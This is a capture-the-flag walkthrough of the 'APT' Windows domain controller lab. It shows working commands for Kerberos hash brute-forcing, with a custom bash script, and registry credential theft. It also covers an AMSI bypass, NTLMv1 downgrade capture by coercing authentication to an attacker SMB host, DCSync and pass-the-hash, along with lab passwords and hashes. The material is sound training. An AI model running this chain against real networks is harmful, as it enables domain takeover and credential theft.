APT

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running behind them.
The following nmap command scans the target quickly for open ports and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.213 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Wed Apr 12 20:59:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
# Nmap done at Wed Apr 12 21:00:08 2023 -- 1 IP address (1 host up) scanned in 26.45 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Wed Apr 12 19:17:32 2023 as: nmap -sCV -p80,135 -Pn -n -oN targeted 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 19:17:47 2023 -- 1 IP address (1 host up) scanned in 14.76 seconds
The website on port 80 is a hosting company site named Gigantic Hosting, with nothing of interest on it.

As port 135 (MSRPC) is also open, we can use the IOXIDResolver tool to enumerate the network interface addresses of the machine.
python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::91b0:8f12:89f1:15ce
Address: dead:beef::e8
The machine has a few IPv6 addresses. Let's add the first one to the /etc/hosts file and assign it the name apt.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f apt
Now that we have the IPv6 address of the machine, let's run the nmap scan again, this time over IPv6.
nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 apt
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPortsv6 file.
-6: use IPv6.
# Nmap 7.93 scan initiated Wed Apr 12 21:00:16 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for apt
Host is up (0.036s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49674/tcp open unknown
49698/tcp open unknown
64885/tcp open unknown
# Nmap done at Wed Apr 12 21:00:43 2023 -- 1 IP address (1 host up) scanned in 26.41 seconds
There are way more ports exposed through IPv6 than IPv4. Let's get their services and versions.
nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 apt
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targetedv6 file.
-6: use IPv6.
# Nmap 7.93 scan initiated Wed Apr 12 22:12:17 2023 as: nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-12 20:12:25Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49688/tcp filtered unknown
49885/tcp filtered unknown
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2023-04-12T21:13:17+01:00
|_clock-skew: mean: -8m33s, deviation: 22m39s, median: 0s
| smb2-time:
| date: 2023-04-12T20:13:15
|_ start_date: 2023-04-12T17:09:56
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 22:13:25 2023 -- 1 IP address (1 host up) scanned in 67.49 seconds
This looks like a domain controller. Nmap got the domain name htb.local. Let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
dead:beef::b885:d62a:d679:573f apt htb.local
Let's enumerate the SMB shares of the DC.
smbclient -L apt -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
backup Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
apt is an IPv6 address -- no workgroup available
As seen below, the backup share has one file called backup.zip. Let's transfer it to our local machine.
smbclient //apt/backup -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 07:30:52 2020
.. D 0 Thu Sep 24 07:30:52 2020
backup.zip A 10650961 Thu Sep 24 07:30:32 2020
5114623 blocks of size 4096. 2632003 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2027.5 KiloBytes/sec) (average 2027.5 KiloBytes/sec)
If we try to unzip it, we'll see it is protected with a password.
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
Let's use zip2john and john to get the password.
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2023-04-14 09:02) 14.28g/s 117028p/s 117028c/s 117028C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now unzip the file again with the recovered password, and we'll see its contents.
unzip backup.zip
Archive: backup.zip
creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password: iloveyousomuch
inflating: Active Directory/ntds.dit
inflating: Active Directory/ntds.jfm
creating: registry/
inflating: registry/SECURITY
inflating: registry/SYSTEM
The archive contains the ntds.dit database and the SYSTEM registry hive, which holds the boot key needed to decrypt it. With these two files we can dump the NTDS hashes offline using secretsdump.
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::
...
[*] Cleaning up...
As we can see, there are a lot of users and hashes. Let's put the users in the users file and the NT hashes in the ntlm file.
cat ntds_dump.ntds | awk '{print $1}' FS=":" > users
cat ntds_dump.ntds | awk '{print $4}' FS=":" > ntlm
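As an added example (not from the writeup), the following Go program parses the domain\uid:rid:lmhash:nthash::: lines of a secretsdump output, the same split the awk commands above do, and then runs a check a defender would want on a dump of their own domain: which accounts share an NT hash, i.e. reuse a password, and which carry the empty-password hash (31d6cfe0..., the value the full dump later on this page shows for Guest and DefaultAccount). The sample input is constructed from the lines shown on this page plus a hypothetical svc.backup account.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// NT hash of the empty password (MD4 of ""), the value the full dump later on
// this page shows for Guest and DefaultAccount.
const emptyNTHash = "31d6cfe0d16ae931b73c59d7e0c089c0"

// Account is one line in the domain\uid:rid:lmhash:nthash::: format.
type Account struct{ User, RID, LM, NT string }

// parseNTDSDump keeps only the hash lines of secretsdump output, skipping
// status lines ("[*] ...") and Kerberos key lines, which have fewer fields.
func parseNTDSDump(dump string) []Account {
	var accts []Account
	for _, line := range strings.Split(dump, "\n") {
		f := strings.Split(strings.TrimSpace(line), ":")
		if len(f) < 4 || len(f[2]) != 32 || len(f[3]) != 32 {
			continue // not user:rid:lm:nt::: (e.g. an aes256-cts-hmac-sha1-96 line)
		}
		user := f[0][strings.LastIndex(f[0], `\`)+1:] // drop an optional "domain\" prefix
		accts = append(accts, Account{user, f[1], strings.ToLower(f[2]), strings.ToLower(f[3])})
	}
	return accts
}

// sharedHashes groups users by NT hash and keeps only groups with more than
// one member: an identical hash means an identical password. The group keyed
// by emptyNTHash lists the accounts that have no password at all.
func sharedHashes(accts []Account) map[string][]string {
	byHash := map[string][]string{}
	for _, a := range accts {
		byHash[a.NT] = append(byHash[a.NT], a.User)
	}
	for h, users := range byHash {
		if len(users) < 2 {
			delete(byHash, h)
			continue
		}
		sort.Strings(users)
	}
	return byHash
}

// sampleDump is constructed from the lines shown on this page plus a
// hypothetical svc.backup account that reuses henry.vinson's password.
const sampleDump = `[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
svc.backup:1107:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
[*] Kerberos keys grabbed
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
`

func main() {
	accts := parseNTDSDump(sampleDump)
	fmt.Println(len(accts), "accounts parsed")
	for h, users := range sharedHashes(accts) {
		note := "password reuse"
		if h == emptyNTHash {
			note = "empty password"
		}
		fmt.Println(h, users, note)
	}
}
```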
Exploitation
Now that we have a list of users, we'll need to find which of these users are valid. We can do it with the kerbrute tool.
kerbrute_linux_amd64 userenum --dc apt -d htb.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/14/23 - Ronnie Flathers @ropnop
2023/04/14 09:28:20 > Using KDC(s):
2023/04/14 09:28:20 > apt:88
2023/04/14 09:28:26 > [+] VALID USERNAME: APT$@htb.local
2023/04/14 09:28:26 > [+] VALID USERNAME: Administrator@htb.local
2023/04/14 09:32:16 > [+] VALID USERNAME: henry.vinson@htb.local
2023/04/14 09:45:23 > Done! Tested 2000 usernames (3 valid) in 1022.331 seconds
It found that henry.vinson is a valid user. As we have a valid user and a list of NTLM hashes, we could try to find his hash by testing each hash of the list. The problem is that if we try to do it through SMB we'll get banned.
crackmapexec smb apt -u 'henry.vinson' -H ntlm
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [-] htb.local\henry.vinson:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
...
SMB apt 445 APT [-] Connection Error: The NETBIOS connection with the remote host timed out.
It seems that the server is banning any brute-force attempt through SMB, but not through Kerberos, because we were able to test which users were valid. So we need to brute force the NTLM hash through Kerberos. I made the following bash script, which tries to obtain a TGT for the henry.vinson user with each NTLM hash from the ntlm file. It uses the getTGT tool from impacket, and you can also set threads to make it faster.
#!/bin/bash
# Try to get a TGT for one user with every NTLM hash in a list; $threads
# getTGT requests run in parallel per batch and the first accepted hash wins.
dc='apt'
username='henry.vinson'
domain='htb.local'
hash_list='/home/alfa8sa/HTB/machines/apt/ntlm'
threads=100
PROGRESS_BAR_WIDTH=25

# draw_progress_bar VALUE MAX [UNIT]: redraw a one-line progress bar in place
draw_progress_bar() {
    local __value=$1
    local __max=$2
    local __unit=${3:-""}
    if (( __max < 1 )); then __max=1; fi
    local __percentage=$(( 100 - (__max*100 - __value*100) / __max ))
    local __num_bar=$(( __percentage * PROGRESS_BAR_WIDTH / 100 ))
    printf "["
    for b in $(seq 1 "$__num_bar"); do printf "#"; done
    for s in $(seq 1 $(( PROGRESS_BAR_WIDTH - __num_bar ))); do printf " "; done
    printf "] %s%% (%s / %s %s)\r" "$__percentage" "$__value" "$__max" "$__unit"
}

lines=$(wc -l < "$hash_list")
counter=1
div=$(( lines / threads + 1 ))    # number of batches of $threads hashes
for batch in $(seq 1 "$div"); do
    margin=$(( counter + threads - 1 ))
    hashes=$(sed -n "${counter},${margin}p" "$hash_list")    # hashes of this batch
    draw_progress_bar $(( counter - 1 )) "$lines" "hashes"
    for hash in $hashes; do
        # getTGT only prints "Saving ticket in ..." when the KDC accepted the hash
        impacket-getTGT "$dc/$username@$domain" -hashes ":$hash" | grep -q "ticket" && echo "$hash" > .hash &
    done; wait
    if [ -f ".hash" ]; then
        echo ""
        echo "Valid NTLM hash: $(cat .hash)"
        rm -f .hash
        exit 0
    fi
    counter=$(( counter + threads ))
done
rm -f .hash
Run the script to get the valid NTLM hash for henry.vinson.
bash bruteforcer.sh
[################# ] 70% (1400 / 2000 hashes)
Valid NTLM hash: e53d87d42adaa3ca32bdb34a876cbffb
Confirm that the hash is valid.
crackmapexec smb apt -u 'henry.vinson' -H e53d87d42adaa3ca32bdb34a876cbffb
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
Impacket has a tool called reg.py which allows querying the remote registry (HKCR, HKCU, HKLM, HKU or HKCC) with valid credentials. Let's look at the contents of HKU.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU
HKU\Console
HKU\Control Panel
HKU\Environment
HKU\Keyboard Layout
HKU\Network
HKU\Software
HKU\System
HKU\Volatile Environment
Inside HKU\Software we'll see the GiganticHostingManagementSystem key.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software
HKU\Software\GiganticHostingManagementSystem
HKU\Software\Microsoft
HKU\Software\Policies
HKU\Software\RegisteredApplications
HKU\Software\Sysinternals
HKU\Software\VMware, Inc.
HKU\Software\Wow6432Node
HKU\Software\Classes
This key might have something interesting, because it is named similarly to the website we saw earlier.
reg.py htb.local/'henry.vinson'@apt -hashes :e53d87d42adaa3ca32bdb34a876cbffb query -keyName "HKU\\Software\\GiganticHostingManagementSystem"
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
Let's verify the found credentials.
crackmapexec smb apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
SMB apt 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB apt 445 APT [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht
They are valid. This user seems to be a member of the Remote Management Users group, since we can get a shell via WinRM and then grab the user flag.
evil-winrm -i apt -u 'henry.vinson_adm' -p 'G1#Ny5@2dvht'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type \users\henry.vinson_adm\desktop\user.txt
cfafacdccf12c0e1a3965551ba302274
Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
upload /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
If we try to run the binary, we'll see that Windows Defender is blocking the binary.
.\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Fortunately for us, evil-winrm has features to get around this: Bypass-4MSI patches AMSI in the session, and Invoke-Binary loads a local .NET executable and runs it in memory, so the binary is never written to the target's disk.
Bypass-4MSI
Invoke-Binary /home/alfa8sa/tools/privEsc/windows/winPEASx64.exe
...
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
[!] NTLM clients support NTLMv1!
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
[!] NTLM services on this machine support NTLMv1!
...
It found that NTLM services and clients on the domain controller still support NTLMv1. This is a problem because the NTLMv1 response is just DES encryption of the server's challenge under keys derived from the user's NT hash, so whoever controls the challenge can recover the NT hash from the response. The idea is to set up a fake SMB server with Responder that always sends the same challenge, capture the NTLMv1 response of the machine account, and then crack it with crack.sh. First, modify the Responder configuration file so that the challenge is fixed to 1122334455667788, the value crack.sh's NTLMv1 tables are built for.
nano /etc/responder/Responder.conf
...
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
...
Then, launch Responder with the LM downgrade option.
responder -I tun0 --lm
-I: network interface to use.
--lm: force LM hashing downgrade.
Now we need to make the victim machine authenticate against our fake SMB server. As we know that Windows Defender is installed, we can use the MpCmdRun.exe binary to scan a random file on our fake SMB share; as the capture shows, the authentication comes from the machine account.
cd "Program Files\Windows Defender"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.14\random
[+] Listening for events...
[SMB] NTLMv1 Client : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Now go to crack.sh's GET CRACKING page and submit the hash.

You should receive an email with the NTLM hash for the machine account of the domain controller.

With this hash we can dump the real NTDS of the domain controller.
impacket-secretsdump -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
[*] Cleaning up...
Now that we have the real NTLM hash of the Administrator user, we can get a shell as that user by passing the hash, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i apt -u 'administrator' -H c370bddf384a691d811ff3495e8a72e2
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
9b4ea0031ea51d07dd67270520495d46